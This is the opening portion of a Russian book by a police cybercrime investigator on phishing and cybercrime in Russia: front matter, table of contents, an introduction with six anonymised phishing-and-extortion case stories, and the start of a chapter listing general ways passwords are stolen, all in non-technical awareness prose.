Особенности киберпреступлений в России: инструменты нападения и защиты информации [Андрей Сергеевич Масалков] (pdf) читать онлайн

Книга включает практический взгляд на механизмы, используемые
киберпреступниками, а также процесс формирования судебного производства и методов расследования таких преступлений.
Приводимые методы атак подкрепляются примерами из реальной жизни.
Углубленно разбираются механизмы получения незаконного доступа к
учетным записям информационных ресурсов, в частности электронной почты.
Акцентируется внимание на методе проведения фишинг-атак как наиболее
эффективном на сегодняшний день инструменте получения паролей.
Приводятся советы по предотвращению кибератак и алгоритм первоначальных действий, которые необходимо предпринимать при наступлении
инцидента и которые направлены на фиксацию следов, эффективное
расследование и взаимодействие с правоохранительными органами.

Масалков А.С. – действующий сотрудник Управления по борьбе
с преступлениями в сфере информационно-телекоммуникационных технологий (Управление «К») Бюро специальных
технических мероприятий МВД России, майор полиции,
имеет высшее техническое образование по специальности
«Компьютерная
безопасность».
На
протяжении
десяти
лет занимается выявлением, пресечением и раскрытием
преступлений, связанных с созданием и использованием
вредоносного программного обеспечения, хищением денежных
средств путем модификации компьютерной информации,
неправомерным доступом к компьютерной информации, а также
использованием специальных технических средств, предназначенных для негласного
получения информации. Знание и большой опыт применения законодательства в сфере
информационной безопасности, уголовно-процессуальной и оперативно-розыскной
деятельности позволяет автору объективно оценивать положение дел в сфере
информационной безопасности и тенденции преступных посягательств.

Интернетмагазин:
www.dmkpress.com
Книга – почтой:
email: orders@alians-kniga.ru
Оптовая продажа:
«Альянскнига»
Тел./факс: (499) 782-3889
email: books@alians-kniga.ru

ISBN 978-5-97060-631-5

www.дмк.рф

9 785970 606315

Особенности киберпреступлений в России

Материал книги помогает разобраться в том, что обычно скрывается
за терминами и шаблонными фразами «взлом электронной почты»,
«кибершпионаж» и «фишинг». Автор старался показать информационную
безопасность как поле битвы с трех сторон: со стороны преступного
сообщества, использующего информационные технологии, со стороны
законодательства и правоохранительной системы и со стороны атакуемого.

Масалков А. С.

Особенности
киберпреступлений
в России:
инструменты нападения
и защита информации

Масалков А. С.

Особенности
киберпреступлений в России:
инструменты нападения
и защиты информации

Москва, 2018

УДК 004.056
ББК 32.972.13
М31

Масалков А. С.
М31 Особенности
­­
киберпреступлений в России: инструменты нападения и защиты информации. – М.: ДМК Пресс, 2018. – 226 с.: ил.
ISBN 978-5-97060-631-5
Материал книги помогает разобраться в том, что обычно скрывается за терминами и шаблонными фразами «взлом электронной почты», «кибершпионаж» и «фишинг». Автор старался показать информационную безопас­ность как поле битвы с
трех сторон: со стороны преступного сообщества, использующего информационные
технологии, со стороны законодательства и правоохранительной системы и со стороны атакуемого.
Книга включает практический взгляд на механизмы, используемые киберпрес­
тупниками, а также процесс формирования судебного производства и методов расследования таких преступлений.
Приводимые методы атак подкрепляются примерами из реальной жизни. Углуб­
ленно разбираются механизмы получения незаконного доступа к учетным записям
информационных ресурсов, в частности электронной почты. Акцентируется внимание на методе проведения фишинг-атак как наиболее эффективном на сегодняшний
день инструменте получения паролей. Фишинг рассматривается как универсальный
инструмент, находящий свое проявление в различных мошеннических и хакерских
комбинациях, как с технической, так и с юридической стороны.
Материал дает возможность пересмотреть и адекватно оценивать риски, эффективность используемых систем защиты, выстроить политику безопас­ности в соответствии с реальностью. Приводятся советы по предотвращению кибератак и алгоритм
первоначальных действий, которые необходимо предпринимать при наступлении
инцидента и которые направлены на фиксацию следов, эффективное расследование
и взаимодействие с правоохранительными органами.

УДК 004.456
ББК 32.972.13

Все права защищены. Любая часть этой книги не может быть воспроизведена в какой
бы то ни было форме и какими бы то ни было средствами без письменного разрешения владельцев авторских прав.

ISBN 978-5-97060-631-5

© Масалков А. С., 2018
© Оформление, издание, ДМК Пресс, 2018

СОДЕРЖАНИЕ

Введение..........................................................................................................................................................6
Глава 1. Хищение паролей методом фишинг-атак............................................................ 20
Методы несанкционированного получения пароля.............................................................. 20
Особенности фишинга......................................................................................................................... 25
Виды фишинговых атак...................................................................................................................... 26
Слепой фишинг....................................................................................................................................... 26
Целенаправленный фишинг.............................................................................................................. 28
1.1. Как это происходит? Фишинг-атака со стороны пользователя
на примере электронного почтового ящика.................................................................................... 30
1.2. Роль социальной инженерии в фишинг-атаке....................................................................... 41
1.3. Фишинг изнутри. Анализ используемых для атаки инструментов................................ 49
Схема взаимодействия с почтовым сервером......................................................................... 50
Три основные функции фишинг-движка..................................................................................... 51
Демонстрация механизма функционирования фишинг-движков
на локальном сервере......................................................................................................................... 52
Фишинг-движок изнутри. Пример 1.............................................................................................. 55
Фишинг-движок изнутри. Пример 2.............................................................................................. 61
Фишинг-движок изнутри. Пример 3.............................................................................................. 64
Автоматическая проверка похищенного пароля..................................................................... 64
Фишинг-движок изнутри. Пример 4...............................................................................................67
Примеры интерфейсов........................................................................................................................ 69
Доменные имена................................................................................................................................... 73
Размещение фэйка на сервере........................................................................................................77

Глава 2. Комбинированные атаки с использованием фишинга................................. 79
2.1. Подготовка к персонализированной фишинговой атаке.
Некоторые специфические способы сбора информации ........................................................ 80
Определение браузера и операционной системы атакуемого......................................... 81
Определение IP-адресов атакуемого........................................................................................... 85
Анализ служебных заголовков........................................................................................................ 86
2.2. Атака с использованием «заброса» вредоносных программ...........................................87

4

Содержание

2.3. Атака с использованием маскировки под легальное программное
обеспечение или файлы.........................................................................................................................100
Анализ зараженной системы..........................................................................................................113
2.4. Атака на мобильные телефоны...................................................................................................115
по

Глава 3. Особенности киберпреступлений.............................................................................125
3.1. Мистика киберпреступности........................................................................................................126
Незримое присутствие......................................................................................................................128
Прочитанные и непрочитанные письма....................................................................................129
Переписка с несуществующим адресатом...............................................................................130
3.2. Характеристика киберпреступления, проблемы идентификации
и трудности перевода..............................................................................................................................136
3.3. Доступность инструментов анонимной связи и управления ресурсами..................144
3.3.1. Доступность анонимной связи и управления ...........................................................146
3.3.2. Виртуальный хостинг, выделенный сервер, VPN.......................................................155
3.3.3. Инструменты управления финансами...........................................................................163

Глава 4. Противодействие и защита..........................................................................................168
4.1. Правоохранительная система......................................................................................................168
4.2. Некоторые национальные особенности борьбы с киберпреступлениями..............175
4.3. Традиционная защита и рыночные тенденции....................................................................185
4.4. Дешевые правила дорогого спокойствия. Советы по защите информации...........190
Защита личных данных....................................................................................................................190
Защита корпоративной информации.........................................................................................191
4.4.1. Реакция на инциденты.........................................................................................................192
4.4.2. Обучение в форме учений, приближенных к реальности....................................193
4.4.3. Учет и контроль ......................................................................................................................195
4.4.4. Аудит и разбор полетов.......................................................................................................196
4.4.5. Целесообразность автоматических операций............................................................197
4.4.6. «Отголоски пиратства».........................................................................................................198
4.5. Что делать, если произошел инцидент....................................................................................199
4.5.1. Изоляция системы..................................................................................................................201
4.5.2. Изготовление клонов носителей информации..........................................................201
4.5.3. Проведение исследований и компьютерно-технических экспертиз................202
4.5.4. Обращение в правоохранительные органы...............................................................208

Глава 5. Никакой мистики, только бизнес. Обзор черного рынка
информационных услуг в России................................................................................................210
Первый блок................................................................................................................................................211
Второй блок..................................................................................................................................................212
Третий блок..................................................................................................................................................213
Четвертый блок...........................................................................................................................................214
Пятый блок....................................................................................................................................................215

Заключение...............................................................................................................................................217
Предметный указатель.......................................................................................................................221

Своим родным и близким, с благодарностью.
Отдельное спасибо за вдохновение дочерям – Марии и Дарье.

ВВЕДЕНИЕ

Стремительное развитие технологий с большим воодушевлением
было встречено лицами, склонными к различного рода аферам
и другим преступным деяниям.
Для хищения денежных средств мошенникам ранее приходилось
подделывать бумажные платежные поручения и приходить с ними
в банк, а для хищения важной информации требовалось проникать
в помещения под покровом ночи и красть либо фотографировать
документы из хитроумных сейфов. Все эти действия, безусловно,
были сопряжены с высоким риском для жулика быть пойманным
за руку и наказанным по всей строгости закона.
Интернет-технологии и сети передачи данных способствовали
росту электронных учетных записей, которые хранят секреты пользователей и позволяют обмениваться важной информацией, а внед­
рение систем дистанционного банковского обслуживания избавило
владельцев счетов от необходимости частых посещений банков для
совершения платежных операций.
Стремление получить прибыль от новых технологий регулярно
приводит к внедрению различных систем, протоколов и стандартов,
которые при внимательном взгляде на них с другой точки зрения
оказываются полны всевозможных уязвимостей.
Так, посмотрев на достижения человечества под другим углом
зрения, криминальный мир обогатился разнообразием методов
преступлений, совершаемых с использованием информационных
технологий и средств связи. Поэтому сегодня мы имеем массу но-

Введение

7

вых видов преступлений и схем их совершения, требующих изучения и выработки алгоритмов противодействия.
Мобильная связь, Интернет, платежные системы, средства дистанционного банковского обслуживания, электронные учетные
запи­си – все это хорошо продается потребителям и значительно
упрощает бизнес-процессы.
Все так называемые высокие технологии, формирующие информационное пространство, стали отдельным полем противостояния
преступного сегмента и общества, при этом, если говорить прямо,
ситуация больше напоминает охоту, чем противостояние.
Бесчисленное количество кибермошенников и хакерских группировок, наводящих ужас на отдельных граждан, корпорации, государственные органы и даже целые страны, вызывают трепет возмущения от бессилия, подпитываемого регулярными выпусками
средств массовой информации. Неуловимость и безнаказанность
злоумышленников, их кажущаяся вездесущность, непостижимость
методов и средств, которыми действуют злоумышленники, – все это
создает не очень оптимистичную картину.
Основная сложность для общества и государства в отношении
киберпреступлений связана с тем, что сфера киберпреступлений
обросла множеством мифов и стереотипов. Неправомерные доступы к компьютерной информации, «взломы» сайтов и почтовых
ящиков, атаки на ресурсы и другие киберпреступления связывают
с немыслимыми по сложности и гениальности техническими процессами, постичь которые может далеко не каждый. Тем не менее
большинство самых известных киберпреступлений просто в исполнении и вполне поддается анализу любым образованным человеком.
Самым эффективным из методов, применяемых как серьезными киберпреступниками, так и мелкими мошенниками, является
фишинг1 во всем его разнообразии. Этот метод может использоваться в различных вариациях, но основная суть его заключается
во введении человека в заблуждение с целью получения от жертвы
требуемой для проникновения в защищенную среду информации
либо совершения пользователем определенных действий. Основные
виды фишинга осуществляются посредством средств связи – теле1

Фишинг, англ. phishing, от fishing – рыбная ловля, выуживание.

8

Введение

фонных звонков, электронных сообщений и специально созданных
сайтов (фишинг-движков).
На сегодняшний день можно выделить несколько обособленных
групп преступлений, так или иначе связанных с фишингом и его
разновидностями, совершаемых с использованием телекоммуникационных сетей.
К одной группе преступлений относятся «слепые звонки» по
абонентским номерам, чаще всего от имени сотрудников службы
безопас­ности, колцентров банков или операторов связи.
Мошенниками осуществляются телефонные звонки по номерным
емкостям мобильных и стационарных телефонов. При осуществлении звонков мошенники подменяют номер вызывающего абонента
таким образом, что у вызываемого абонента отображается номер
телефона, принадлежащий соответствующему банку или другой
официальной организации, от имени которой действует злоумышленник.
В процессе общения с клиентами банка злоумышленники с использованием методов социальной инженерии получают сведения
о реквизитах, принадлежащих потерпевшим, банковских картах
и иную информацию, необходимую для осуществления дистанционных операций по переводу денежных средств. После чего с использованием системы удаленного банковского обслуживания злоумышленники осуществляют хищение денежных средств с банковских
счетов и платежных карт.
Технология подмены абонентского номера и связанная с этим
преступная деятельность будут еще затронуты далее (п. 3.3.1).
К другой группе преступлений, использующих фишинг, можно
отнести рассылки сообщений, содержащих ссылки на скачивание
вредоносного программного обеспечения1. Сообщения рассылаются
как в виде SMS на абонентские номера, так и в виде электронных
сообщений на почтовые ящики, мессенджеры и аккаунты социальных сетей.
Один из простых примеров этой категории преступлений практиковался в 2013–2014 годах, в некоторых регионах встречается
1

Вредоносным ПО в соответствии со ст. 273 УК РФ принято считать компьютерную программу, предназначенную для несанкционированного уничтожения,
блокирования, модификации, копирования компьютерной информации или
нейтрализации средств защиты компьютерной информации.

Введение

9

и по сей день. Применялась схема, целью которой было заражение
мобильного телефона вредоносной программой, осуществляющей
рассылки сообщений вида: «Имя контакта из записной книжки мобильного телефона, для Вас есть новое MMS-сообщение. Ссылка»
или «Имя контакта из записной книжки мобильного телефона, по
Вашему объявлению на сайте. Может, обменяемся? Ссылка».
Общим признаком для всех аналогичных сообщений являлось
наличие обращения к абоненту по имени либо имени-отчеству,
в зависимости от того, как он был внесен в записную книжку ранее
зараженного мобильного телефона, а также обязательное наличие
ссылки на интернет-ресурс.
При переходе по ссылке на мобильное устройство потерпевшего
скачивается вредоносное программное обеспечение, которое получает доступ к телефонной книге мобильного телефона для осуществ­
ления дальнейших рассылок сообщений, содержащих ссылки на
скачивание вредоносного программного обеспечения. В зависимости от типа вредоносной программы могла также присутствовать
функция, позволяющая скрыто от пользователя отправлять и получать SMS-сообщения в целях совершения операций с привязанными к абонентскому номеру потерпевшего банковскими картами
и электронными кошельками.
Частыми явлениями стали рассылки электронных писем от лица
государственных органов с вложением файлов, содержащих вредоносные алгоритмы, либо упомянутые выше ссылки на скачивание вредоносного программного обеспечения. Злоумышленниками
осуществляется рассылка электронных писем от имени прокуратуры, налоговой службы, в теме которых указывается, например,
«Предпи­сание об устранении нарушений», «Штраф», «Сверка».
В качестве примера подобной рассылки на электронные почтовые адреса можно привести рассылку фишинговых писем от имени
Банка России, так называемые «вакансии», отличительной чертой
которых являлось наличие вложения с заголовком вида «вакансия_
NoХХ.doc». Согласно отчету FinCERT1 (Центра мониторинга и реагирования на компьютерные атаки в кредитно-финансовой сфере
1

Отчет Центра мониторинга и реагирования на компьютерные атаки в кредитно-финансовой сфере Главного управления безопас­ности и защиты информации Банка России за период с 1 июня 2015 г. по 31 мая 2016 г. URL: http://www.
cbr.ru/statichtml/file/14435/fincert_survey.pdf.

10

Введение

Главного управления безопас­ности и защиты информации Банка
России), во вложении таких сообщений содержался макрос, выполняющий скачивание загрузчика вредоносного ПО.
С целью придания достоверности данным письмам для рассылки
используются электронные адреса и доменные имена, визуально
схожие с доменными именами реальных сайтов государственных
органов. При переходе по ссылке, содержащей такое доменное имя,
может осуществляться перенаправление пользователя на официальный сайт соответствующей государственной структуры.
В тексте письма от имени должностных лиц, как правило, излагается важная причина, по которой незамедлительно требуется
открыть вложенный файл, имеющий вид электронного документа,
либо перейти по содержащейся в письме ссылке на интернет-ресурс.
После открытия документа или совершения перехода по ссылке компьютер пользователя заражается вредоносным программным обеспечением, которое в зависимости от заложенного в него
функционала может заблокировать доступ к имеющим значение
для финансово-хозяйственной деятельности организации файлам
(документам, базам данных бухгалтерских и складских программ)
с последующим вымогательством денежных средств за их разблокировку (расшифровку); либо может управлять программой удаленного банковского обслуживания и формировать платежные поручения
с внесением в реквизиты получателя средств данных подконтрольных злоумышленникам счетов.
Использование фишинговых сайтов составляет третью условную
группу преступлений, связанных с фишингом.
Эта группа включает в себя создание сайтов, оформленных в виде
почтовых сервисов, банковских ресурсов, социальных сетей или интернет-магазинов.
Примером такой незаконной деятельности может быть интернетмагазин, торгующий популярными товарами, зачастую по сниженным ценам, по сравнению со среднерыночными.
Злоумышленниками создается сайт, визуально схожий с уже су­
ществующим, «раскрученным», либо совершенно новый интернет-магазин. При заказе товара осуществляется перенаправление
пользователя на фишинговую страницу оплаты, практически не
имеющую отличий от страницы официальной платежной системы.
При вводе пользователем на данной странице учетных данных для

Введение

11

входа в личный кабинет платежной системы они, естественно, попадают в распоряжение злоумышленникам, после чего используются
для хищения денежных средств со счетов электронного кошелька.
Наибольшую же популярность фишинг приобрел у охотников за
чужими паролями. Этой группе киберпреступлений в книге уделено особое внимание, потому что автор считает это направление
киберпреступлений наиболее опасным и, совершенно напрасно,
недооцениваемым как пользователями, так и специалистами.
Разнообразные онлайн-сервисы и гаджеты, программы и технологии вошли в жизнь человека, внедрились в бизнес-процессы
и государственные услуги, начали использоваться в политике и, закономерно, стали инструментами и мишенями преступной деятельности.
Началом эры компьютерной киберпреступности автор склонен
считать 2005–2006 годы. Многими специалистами 2007 год указывается как точка отсчета – начало широкомасштабных кибервойн
(кибератаки на ресурсы Германии, Эстонии, затем Грузии, Ирана).
С этим периодом связано начало профессионального использования кибершпионажа для достижений определенных целей – финансовой выгоды, кражи интеллектуальной собственности, пропаганды
и прочего. И основным оружием для ведения кибервойн и реализации кибершпионажа стал фишинг.
Кибершпионаж застал врасплох консервативных управленцев
всех мастей, считавших, что существующие правила и меры безопас­
ности способны защитить информацию и финансы.
Регулярно привлекает внимание появляющиеся в СМИ и на просторах Интернета отрывки личной переписки бизнесменов, политиков,
различных корпоративных материалов, документов для служебного
пользования, фотографий известных лиц, моделей, ведущих, актрис
и других медийных личностей, которые похищаются из почтовых
аккаунтов, облачных хранилищ, серверов и мобильных телефонов.
Многие читатели слышали про интернет-площадку, которую связывают с деятельностью нашумевшей в 2016–2017 годах хакерской
группировки. На той площадке, несмотря на появившуюся в СМИ
информацию о задержании членов данной хакерской группы1, и се1

СМИ узнали о задержании ФСБ создателя сайта «Шалтай-Болтай» // РБК. URL:
https://www.rbc.ru/politics/28/01/2017/588c8ddf9a79475260f2e1da.

12

Введение

годня предлагается всем желающим приобрести электронную пе­
реписку чиновников и бизнесменов за криптовалюту.
Сегодня кибершпионаж задевает всех, кто является носителем
информации, за которую теоретически можно получить деньги, кто
владеет или управляет финансами, кто принимает важные решения,
и даже тех, кто просто кому-то интересен.
В этой книге не будут затронуты международные отношения и противостояние секретных специальных служб, это как-нибудь в следующий раз, лет через тридцать. Материал книги касается гражданского
смыслового значения кибершпионажа, которое связано с несанкцио­
нированным получением и использованием компьютерной информации врагом: конкурентами, хакерами, мошенниками, маньяками.
Кибератаки стали массовым явлением, а их направления задевают все сферы общества.
В столь широком распространении киберпреступлений некоторые специалисты склонны винить пользователей, не всегда соблю­
дающих обыкновенные правила компьютерной безопас­ности, сравнивая эти правила с соблюдением правил дорожного движения.
Однако, по мнению автора, беда пришла с другой стороны.
Проигрыш перед информационной угрозой был предначертан
особенностями психологии человека. Именно психология стала
основной уязвимостью, тем местом, где инструменты социальной
инженерии успешно эксплуатировали эмоции, стереотипы и ассоциативное мышление.
Сложившееся впечатление об эффективности программно-аппаратных средств защиты, вера в дорогостоящие решения и неграмотные инструкции лишь усугубили проблему компьютерной
безопас­ности.
Несмотря на серьезные затраты, вкладываемые в обеспечение
безопас­ности, количество и многообразие преступлений, совершаемых с использованием компьютерных технологий, возрастает
с каждым годом. Все чаще юридические лица несут репутационные
и финансовые потери от кражи информации, составляющей коммерческую тайну, и подвергаются кибератакам.
Для демонстрации наиболее популярных ситуаций, связанных
с применением фишинга, будет нелишним привести несколько типичных историй, своеобразных образцов актуального в сегодняшние дни гражданского кибершпионажа.

Шесть типичных историй

13

Шесть типичных историй
История первая
Бухгалтерия обслуживала несколько организаций, входящих
в один холдинг. Все платежи проводились с использованием системы дистанционного банковского обслуживания только одним
лицом – главным бухгалтером. Платежи в компании проводились
строго по графику и с обязательным соблюдением разработанных
инструкций.
Система дистанционного обслуживания компании, на которую
приходилась основная коммерческая деятельность, была защищена SMS-подтверждением на каждый платеж, однако такая система
предусматривает настройку доверенных платежей на избранных
контрагентов.
На вторую организацию, входящую в холдинг, с основной компании регулярно переводились денежные средства для оплаты различных коммунальных услуг, в связи с чем такие платежи были доверенными, а значит, на данного контрагента SMS можно не получать
и не требуется вводить код подтверждения.
В один прекрасный день, придя на рабочее место, главный бухгалтер не смог запустить свой компьютер по неким техническим
причинам, и, соответственно, войти в систему дистанционного банковского обслуживания также не удалось. Специалисты технической поддержки порекомендовали переустановить программы на
используемом компьютере и провести проверку на вирусы.
Пока системный администратор организации занимался компью­
тером, бухгалтер поехал в банк, где выяснилось, что с обеих организаций холдинга похищено более 20 млн рублей.

История вторая
Руководитель крупной организации много лет для личной и деловой переписки использовал электронный адрес «такой-то». Пароль
менял регулярно, приблизительно раз в квартал, и все пароли придумывал сложные, состоящие из различных сочетаний букв и цифр.
Для защиты от вредоносных программ на устройствах – мобильном
телефоне и ноутбуке, используемых для входа в аккаунт, – были
установлены платные антивирусные продукты.

14

Введение

Однажды на электронный адрес данному бизнесмену от незнакомого отправителя пришло письмо, содержащее детальную информацию о частной жизни бизнесмена и осуществляемой им коммерческой деятельности во всех тонкостях.
В письме злоумышленник также сообщал, что получил у одного
из деловых партнеров бизнесмена от его имени денежные средства
в размере 100 тыс. долларов США.
Сообщение содержало предупреждение о возможных негативных
для бизнесмена последствиях в случае, если он не согласится заплатить неизвестным лицам денежные средств в размере 200 тыс.
долларов США.
Служба безопас­ности по указанию бизнесмена начала проверку
информационных систем организации и деловых партнеров.
Как выяснилось в результате проверки, несколько месяцев назад с электронного ящика бизнесмена в адрес одного из деловых
партнеров, использующего электронный адрес «какой-то», поступали сообщения, касающиеся заключения коммерческой сделки.
Переписка от имени бизнесмена велась в течение продолжительного времени. В итоге таких переговоров неустановленные лица (от
имени бизнесмена) просили передать ему через доверенное лицо
денежные средства в размере 100 тыс. долларов США в счет одного
из траншей по некой сделке.
По достигнутой договоренности было условлено передать указанную сумму в офисе партнера. Человек, представившийся доверенным лицом, в назначенное число прибыл в офис партнера и получил
денежные средства. Он прошел через все посты охраны и камеры
видеонаблюдения, получил денежные средства и таким же образом,
улыбаясь всем встреченным камерам, покинул бизнес-центр.
Спустя некоторое время на электронный адрес бизнесмена поступило указанное выше сообщение. Следом за этим сообщением
поступили инструкции по процедуре проведения платежей и номера счетов для перевода денежных средств.
Для пущей убедительности злоумышленники отправили еще три
сообщения, содержащих более двухсот вложенных файлов, являющихся изображениями (скриншоты). На изображениях содержалась
информация об осуществляемой бизнесменом личной и деловой
переписке с использованием принадлежащего ему электронного
почтового адреса, о сообщениях и документах.

Шесть типичных историй

15

История третья
Предприниматель для личной и деловой переписки использовал
электронный адрес «такой-то». При использовании электронного
адреса авторизацию осуществлял только через программу-браузер,
обращаясь на сайт почтового сервера. Почтовыми клиентами (программами) для авторизации на электронном адресе не пользовался,
пароля от почты никому не передавал.
Одним июньским утром на абонентский номер предпринимателя
поступило SMS-сообщение с требованием денежных средств за сохранение тайны его переписки. Предприниматель проигнорировал
это сообщение, посчитав его спамом, и автоматически удалил.
Спустя месяц с электронного адреса «такого-то» на почту предпринимателя поступило электронное письмо под заголовком «Аукцион! Продается массив почтового ящика, принадлежащего…».
В данном письме содержалась ссылка на ресурс (интернет-биржу), где администраторы и организаторы ресурса предлагали выкупить содержимое электронного почтового ящика предпринимателя,
включая входящие и исходящие сообщения, за 180 биткоинов.
Письма, содержащие предложения приобрести содержимое поч­
тового ящика предпринимателя, а также отрывки переписки его
ближайших помощников злоумышленники в качестве рекламы
своего товара разослали всем лицам из контактов, обнаруженных
в переписке, а также разместили на бирже.

История четвертая
Произошел этот инцидент с организацией ООО «Что-то там», основными видами деятельности которой являются разработка программного обеспечения, поставка, тестирование, обслуживание
компьютерного оборудования. Данной организацией использовался
расчетный счет «цифры», открытый в ПАО «банк».
Однажды, проверяя предоставленные бухгалтером выписки по
расчетным счетам, генеральный директор заметил записи о проведении с расчетного счета организации двух подозрительных платежей: платежное поручение № 235 на расчетный счет «много цифр»
компании ООО «Хорошая компания» на сумму 4 083 280 рублей,
с указанием назначения – «оплата по счету № 4205/3 по договору
355 за серверное и компьютерное оборудование», платежное пору-

16

Введение

чение № 236 той же даты, на расчетный счет «много других цифр»
ООО «Отличная компания» на сумму 3 075 740 рублей с указанием
назначения – «оплата по счету № 4206/1 по договору 41 за серверное
и компьютерное оборудование».
Учитывая, что данные организации генеральному директору
были неизвестны и договорных отношений с ними не имелось, он
тут же уточнил у бухгалтера, откуда она, собственно, получила информацию о проведении платежей в адрес указанных организаций.
Бухгалтер пояснила, что реквизиты для перечисления денежных
средств поступили на используемую бухгалтером почту с адреса
самого генерального директора вместе с обычными инструкциями
по оплате.
Однако реквизитов ООО «Хорошая компания» и ООО «Отличная
компания», а также поручений по оплате указанным организациям
генеральный директор бухгалтеру никогда не направлял.
После обнаружения произошедших инцидентов компания обратилась к техническим специалистам для проверки программного
обеспечения на используемых компьютерах. Проверка ничего подозрительного не выявила.
Компания также обратилась с заявлением на возврат денежных
средств в адрес банка, в котором открыт расчетный счет их организации, и к организациям – получателям указанных платежей.

История пятая
Крупная российская компания вела переговоры с зарубежным изготовителем по приобретению и поставке некоего технического оборудования стоимостью около 300 тыс. долларов США, при этом обмен сообщениями осуществлялся посредством электронной почты.
По результатам переговоров, которые длились несколько месяцев,
от поставщика по электронной почте был получен счет на оплату
первого транша. После проведения платежей поставка в оговоренные сроки осуществлена не была.
Представитель отечественной организации, выступающей покупателем, позвонил поставщику и после долгого разговора с представителем зарубежной компании не сразу осознал произошедшее,
а после осознания очень загрустил.
Зарубежный поставщик оборудования поведал, что российская
компания три месяца назад перестала обсуждать условия поставки

Шесть типичных историй

17

и отказалась от сделки после отказа со стороны поставщика снизить
еще немного стоимость, сославшись на выбор другого поставщика
по более выгодным условиям.

История шестая
Такого типа истории часто рассказывают медийные персоны, и все
их рассказы, похожие один на другой, звучат приблизительно так:
В такой-то период времени мне на электронную почту пришло письмо, содержащее принадлежащие мне фотографии и переписку частного характера. Данная информация не предназначалась для публикации
и передавалась исключительно конкретному получателю. Никому своего
сложного пароля к электронной почте я не давала. Сегодня с меня требуют перевести денежные средства на счет, иначе эта переписка, фотографии, видеозаписи будут опубликованы в Интернете. Хакеры уже начали
отправлять некоторые фотографии в СМИ и лицам из моих контактов…

Во всех описанных выше типичных историях злоумышленники
для осуществления неправомерного доступа использовали фишингатаки, и практически везде, где пахнет кибершпионажем, оказывается замешан фишинг, поэтому к деталям описанных примеров мы
обязательно вернемся позже.
Под прицелом находятся частная жизнь, тайна переписки и телефонных переговоров, авторские и смежные права, коммерческая
и банковская тайны, денежные средства и безопас­ность.
Главным объектом преступных посягательств стала компьютерная информация, которая может представлять собой как отдельный
файл, изображение, программное обеспечение, базу данных, так
и совершенно любые сведения о лицах, предметах и событиях.
Все многообразие методов динамично развивающейся сферы
киберпреступлений объединяет информация во всех ее цифровых
проявлениях.
Электронный почтовый ящик для многих людей является сосредоточением информации о личной и деловой жизни. Публичные элект­
ронные почтовые сервисы сегодня объединяют под одним аккаунтом множество полезных для человека дополнительных сервисов.
Получив доступ к одной лишь электронной почте, злоумышленник получит доступ и к облачным хранилищам файлов (документов, программ и фотографий), средствам управления электронными
счетами, данным с мобильных устройств, подключенных к учетной

18

Введение

записи. У злоумышленника в руках также окажется информация
о круге общения, намеченных планах, распорядке дня, маршрутах
передвижения…
Какое преступление последует за неправомерным доступом
к компьютерной информации, зависит от того, как она будет использована злоумышленником.
Существует множество законов, защищающих информацию, относя ее к различного рода тайне – коммерческой, банковской, врачебной, нотариальной и многим другим. Но если информация имеет
компьютерное представление, получить доступ к этой тайне часто
становится в равной степени просто, несмотря на ее тип.
Инструменты для совершения компьютерных преступлений постоянно видоизменяются, используются по отдельности или объединяются в комплексы.
Прогресс рождает новые виды преступлений: у человека появился автомобиль – украли автомобиль, появилась компьютерная информация – украли информацию.
Масштабы киберпреступности и тенденции роста признаются
и неоднократно озвучиваются, так, Генеральный прокурор Российской Федерации Юрий Чайка, принимая участие в III встрече руководителей прокурорских служб государств БРИКС, посвященной
вопросам противодействия киберпреступности, отметил, что в Российской Федерации число преступлений, совершаемых с использованием современных информационно-коммуникационных технологий, с 2013 по 2016 год увеличилось в 6 раз (с 11 тыс. до 66 тыс.)1.
По данным официальной статистики, в России за первое полугодие
2017 года ущерб составил более 18 млн долларов США.
За всей лавинообразной наступательностью киберпреступности скрывается много причин, но основная из них – очень низкий
уровень риска для преступника быть пойманным и наказанным.
Ответы напирающей киберпреступности со стороны атакуемого
общества, компаний и государства даются невнятные, порой пора­
зительные, даже смешные.
От кибершпионажа нет универсальных способов защиты. От него
нельзя спастись, наняв охрану или затратив массу денежных средств
на программно-аппаратные средства.
1

https://genproc.gov.ru/smi/news/news-1237284/.

Шесть типичных историй

19

Для эффективной защиты от кибершпионажа необходимо знать
о его методах и источниках угрозы. И чем больше знаний о методах
кибершпионажа, тем меньше вероятность стать его жертвой.
Поэтому эффективные способы несанкционированного доступа к информации и дальнейшее ее неправомерное использование
и есть предмет обсуждения этой книги.
Мы поговорим о том, что помогает развиваться киберпреступлениям, как с этим ведется борьба и как часто эта борьба помогает
процветать злоумышленникам.
Обсуждать это нужно еще и потому, что пугающие тенденции
законотворческого развития последних лет могут привести нас
в светлое будущее без свободного интернета и всей его удобной
функциональности.
Принимая во внимание, что на сегодняшний день фишинг является одним из самых распространенных и эффективных методов,
направленных на хищение персональных данных и вообще любой
информации ограниченного доступа, а также используется в различных комбинациях при комплексных кибератаках, этому методу
в книге будет уделено максимум внимания.
Уделив заслуженное внимание фишингу, разобрав его по косточкам, можно будет приступить к рассмотрению основных комбинаций его использования, причин его невероятной эффективности,
характеристике метода как преступления, изучить правоохранительный и законодательный взгляд на явление, проанализировать
применяемые методы противодействия и защиты.
В заключении книги представлен актуальный анализ черного
рынка информационных услуг, который процветает и поражает своим ассортиментом даже специалистов.

ГЛАВА 1
Хищение

паролей

методом фишинг-атак

Ходы кривые роет
Подземный умный крот.
Нормальные герои
Всегда идут в обход.
В. Н. Коростылев.
«Нормальные герои»

Неправомерный доступ к компьютерной информации может осуществляться с различными целями: проникновение в корпоративные сети, совершаемое отдельным хакером по заданию конкурентов, как часть комбинированной кибератаки с целью хищения
денежных средств, или взлом электронного почтового ящика либо
аккаунта социальной сети по заказу ревнивого супруга или частного
детектива.

Методы несанкционированного получения пароля
В любом случае, получение скрытого несанкционированного доступа к содержимому электронной почты или доступ к учетной запи­
си любого другого онлайн-сервиса (аккаунта в социальной сети,
личного кабинета) можно теоретически реализовать несколькими
основными способами:
1) методом подбора пароля (brute-force), включая ручной утопический вариант, а также использование многочисленных программ, реализующих атаки по словарям и гибридные атаки;

Методы несанкционированного получения пароля

21

2) посредством вредоносной программы, исполняемой на
компью­терном оборудовании жертвы (компьютере, ноутбуке, мобильном телефоне), внедряемой удаленно;
3) посредством вредоносной программы, исполняемой на
компью­терном оборудовании (компьютере, ноутбуке, мобильном телефоне) жертвы, при физическом доступе к оборудованию пользователя;
4) путем использования программных утилит (HackTool) при
физическом доступе к компьютерной технике пользователя;
5) установкой специальных технических средств – аппаратных
кейлогеров1, при физическом доступе к компьютерной техникепользователя;
